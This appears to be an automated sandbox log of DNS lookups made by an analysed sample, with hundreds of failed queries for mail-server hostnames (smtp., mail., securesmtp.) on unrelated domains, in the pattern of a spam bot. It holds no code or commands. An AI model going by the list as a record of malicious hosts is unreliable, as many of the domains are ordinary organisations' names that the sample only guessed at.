                                                Source: unknownDNS traffic detected: query: smtp.whiteandwhite.se replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.multipirantijaya.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: securesmtp.cookie.lbsg.net replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.stresser.f2s.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.xtreme-server.co.uk replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.tgristar-car.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.dmyzrsny.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.sint.co.ao replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.felfleet.fr replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.hmouse.fr replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: reseau-linux.fr replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.soireebleue.fr replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mailno.sgsbp.it replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: collapimga.fun replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.apptunix.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.student.sic.ac.cn replaycode: Server failure (2)
                                                Source: unknownDNS traffic detected: query: mail.martin-nordby.no replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: securesmtp.schmitt-wiesentheid.de replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: opaforlife.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: foresctwhispers.top replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: tecnoacuar.com replaycode: Server failure (2)
                                                Source: unknownDNS traffic detected: query: smtp.artswolf.esy.es replaycode: Server failure (2)
                                                Source: unknownDNS traffic detected: query: securesmtp.rdswebsite.net replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: quietswtreams.life replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.eyhorn.de replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: districtdesignnaples.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.vknwkvxp.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.temp2.club replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.jnaqff.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.draexlmaier.de replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.marjana.ua replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.mail.instagram replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.maxl.com.ua replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.ext.yousician.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.captainnemo.us replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.1539289461.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.manning.nottingham.sch.uk replaycode: Server failure (2)
                                                Source: unknownDNS traffic detected: query: out.hard-voyeur.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.dev-ique.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: securesmtp.olddog.com.br replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.thornebay-ak.gov replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: marjana.ua replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.bsgt.com.cn replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.bilseqiy.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.settleappraisal.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.arnet.com.ar replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.kiodanepal.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: securesmtp.pbpackaging.com replaycode: Server failure (2)
                                                Source: unknownDNS traffic detected: query: mail.fastpacemedia.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.tcat.us replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.hakretz.ac.at replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: securesmtp.insulflex.ca replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: earthsymphzony.today replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.siencemail.co.uk replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.vinsdesgarrigues.fr replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.tramier.fr replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: securesmtp.studitalerciognani.it replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.zax.ro replaycode: Server failure (2)
                                                Source: unknownDNS traffic detected: query: out.arashvakil.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: securesmtp.vupeat.com.br replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.blackvoicesblackvisions.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: henyau.ua replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.kaden.hk replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.Justoz.com.au replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: z4marketing.com.br replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.burghardt5.de replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: Notgetting.Hacked replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.dathao.shop replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: securesmtp.hellohd.tv replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.b.bg replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.wasp.nav.mil replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.xedos.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: securesmtp.talstar.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.x-factor.us replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.drogariasantafe.com.br replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.2z4qv2m15s.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.lolcathost.se replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: theblackrose.es replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.modelo.ind.br replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.dvconsultores.com.pt replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.michiana.org replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.dk-technik.de replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.cyberboutiquesexe.net replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: securesmtp.segalsmetals.co.za replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.jubzpb.vop replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.dynetcom.fr replaycode: Server failure (2)
                                                Source: unknownDNS traffic detected: query: securesmtp.dollinger.ie replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.surfersmap.es replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.glomedvn.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.students.bismarck.k67.il.us replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: securesmtp.pttbsa.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.mihanmil.ir replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.bryonymaycakes.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.trtdkhom.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.lisar.it replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.n4point.onmicrosoft.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.devriesmoving.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: dawtastream.bet replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.feltrex.cl replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.montague.co.nz replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.bos-carton.fr replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.kjkjs.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.jazzmedia-and-more.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.escuelagasparcabrales.cl replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.omv.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.toiture-62.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.chat2play.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: myself.co.id replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.vinotekafany.cz replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.celgene.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: stjosephwomen.on.ca replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: gsaav.sacyl.es replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.jenniferchon.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.pec.ordineavvocatinocerainferiore.it replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.r2k.com.au replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.heavenfighter.de replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.root-solutions.co.uk replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.studentplus.kiev.ua replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: vorsin.net replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: 6d8uq.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.gcareplan.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: fix.zp.ua replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: gmbol.cem replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.pacificbaharibali.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.atc.torino.it replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.ssm.silesia.pl replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.aluno.ceiparaty.com.br replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.maxwork.at replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: logyx.com.br replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.sahinkalip.com.tr replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.timpress.fr replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.moonstoneblue.com.au replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.uz86.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.erx.aph.fr replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.ambo.co.pl replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.uka.ua replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.mymelody.com.sg replaycode: Server failure (2)
                                                Source: unknownDNS traffic detected: query: out.gmila.con.vu replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.repon.com.br replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.austinoutdoor.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.khat.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: securesmtp.wbrea.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.gfdjdsf.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.afpm.net replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.stevilevi.karoo.co.uk replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.maplecrestpartners.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.standardprocess.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.iflab.kiev.ua replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.43gmIl.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.kostyn.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.deepemailbox.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.REDAMBIENTAL.COM replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.delek.co.il replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.sunshinelandscapingco.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.afsvinsurance.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.POP.COM.BR replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.uddeholm.se replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.sisfo.brg.go.id replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.tecnogips.it replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.askotka.com.pl replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.ctokiev.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: globesoftwares.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.creationsgrenouilledamour.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: securesmtp.toptenpercent.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: tracnquilforest.life replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.sanlmbqf.fr replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: hwehze.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.medway.org.uk replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.tiph.vetmed.uni-muenchen.de replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: eujleek.cem replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.askotka.com.pl replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: securesmtp.microbal.com.ar replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.kolk.ppp replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.itcampusuk.eu replaycode: Server failure (2)
                                                Source: unknownDNS traffic detected: query: out.motabhai.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.wmconnect.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.ncgd.es replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.pauliesabol.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.aluno.ceiparaty.com.br replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.8jtlzbf.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.franksalot.net replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: craie.fr replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.skobes.se replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: seizedsentec.online replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: securesmtp.lexiconitkonsult.se replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.proton.me replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.ikbkmooewg.net replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.davieshowe.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.luxine-sexy.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.mpundit.fr replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: securesmtp.hoefgen.de replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.cisinfo.fr replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.nslg.net replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mundialam.net replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.uwezomicrofinance.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: tianya.cn replaycode: Server failure (2)
                                                Source: unknownDNS traffic detected: query: secure.adeag.fr replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.cegetel.net replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.icic.org.mx replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: securesmtp.becrazyrich.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.aksoto.idps.co.uk replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: securesmtp.enerlis.fr replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.super-elements.net replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.ica-sl.es replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.elfidel.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.ext.yousician.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.edu.uki.fi replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: dhsalfads.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.alumno.uned.es replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.chatservicesmarketingagency.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.postreland.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: securesmtp.sekkeli.net replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: securesmtp.mondohedge.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.mortgagesrq.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.sarabonomo.191.it replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.keybusiness.fr replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: securesmtp.mittvardforbund.se replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.cvportal.net replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.speccom.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: securesmtp.indux.it replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.airnwire.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.chello.hu replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.rorbjornen.se replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.ausl.feit replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.hjir.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.inacapmail.cl replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.dvinci.co replaycode: Server failure (2)
                                                Source: unknownDNS traffic detected: query: secure.abccargas.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.lgarner.fr replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.materna.dk replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.optimieron.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: securesmtp.carpetbonanza.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.Studsandsuds.onmicrosoft.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.jheeah.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: clarco.uk replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.cepios.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.yvksxl.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.provident.pl replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.siteware.com.br replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.celer-it.fr replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.barrksdale.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: securesmtp.fpchiapas.gob.mx replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.ashebe.cf replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: securesmtp.biele.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.scarc.org.au replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.votorantimpb.com.br replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: securesmtp.thlonline.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.enimsmel.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: repository.usu.ac.id replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: securesmtp.c1jjpan.com replaycode: Server failure (2)
                                                Source: unknownDNS traffic detected: query: wmlgmhma.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.french4all.co.uk replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.faddem.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.osginstitute.net replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.guruku.id replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: strawpeasaen.fun replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: securesmtp.ameeventos.com.br replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.ojpmchole.cem replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: securesmtp.mnmassociates.co.uk replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.guimaraes2.com.br replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.magisaracing.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.nesjo.education replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.hilmersson.net replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.ceo6.vn replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.pop.com.br replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.coffeedesk.pl replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.flyvisionweb.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.reco-hagel.de replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.mybizport.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: securesmtp.fudgedesign.co.uk replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: ivnffgsr.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.cedar-stuff.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: actif-animation.fr replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: securesmtp.barkernyc.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.almlf.org replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.thomaslloyd-erneuerbare-energien.de replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: securesmtp.studio-y.in replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.associatedprivate.cn replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: securesmtp.outerdialog.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.medicalvillage.sa replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: securesmtp.aichi.aw replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.chaletdespraz.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.3a5r.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.seplcables.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.alcatel-lucent.fr replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: jingdong1212.cn replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: boucherjones.com.au replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.xtra.co.nz replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.schmittseite.de replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.brite-mail.co replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.maigrot.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: securesmtp.hasircilartextile.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.zwergenzunft.de replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.gapps.timberlane.net replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.fototiryaki.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.sosnewsfeed.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: astron.net.au replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.fondationfolon.be replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: securesmtp.email.it replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.tyser.co.uk replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.commune.dz replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.eg-creje.cem replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.z7azw.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: securesmtp.cg.ju replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.bfaga.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.medidoc.ca replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.bankalbilad.com.sa replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.tescott.ca replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.wfcrxm.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.rodinetti.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: securesmtp.tq3.pl replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.bb.vv replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.mharelick.net replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.formisco.se replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.praticx.it replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.kaintstop.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.gdd.nl replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.bnipuertovallarta.info replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: securesmtp.windsorvoice.co.uk replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.brooks.af.mil replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.retrolegende.fr replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.globesoftwares.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.aclconstructora.cl replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: bigpoint.acc replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.tfz.net replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.metalsero.cl replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: w.cn replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: gookjt.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.slapr.fr replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: securesmtp.clavecillas.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: siriwat.co.th replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.tahin.com.tr replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.ljs.ca replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: znarodom.ua replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.oransd.fr replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.abigailmichaels.com replaycode: Server failure (2)
                                                Source: unknownDNS traffic detected: query: securesmtp.lumaresources.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: securesmtp.kastnernetwork.us replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.flby.fr replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mehmet5466.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.joeyxt.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.kimo.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.zqtfdt.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: mail.cbet.adv.br replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.iamulher.com.br replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.itelefonica.com.br replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: smtp.samsung.com replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: out.mac4pro.fr replaycode: Name error (3)
                                                Source: unknownDNS traffic detected: query: secure.p00jan.com replaycode: Name error (3)
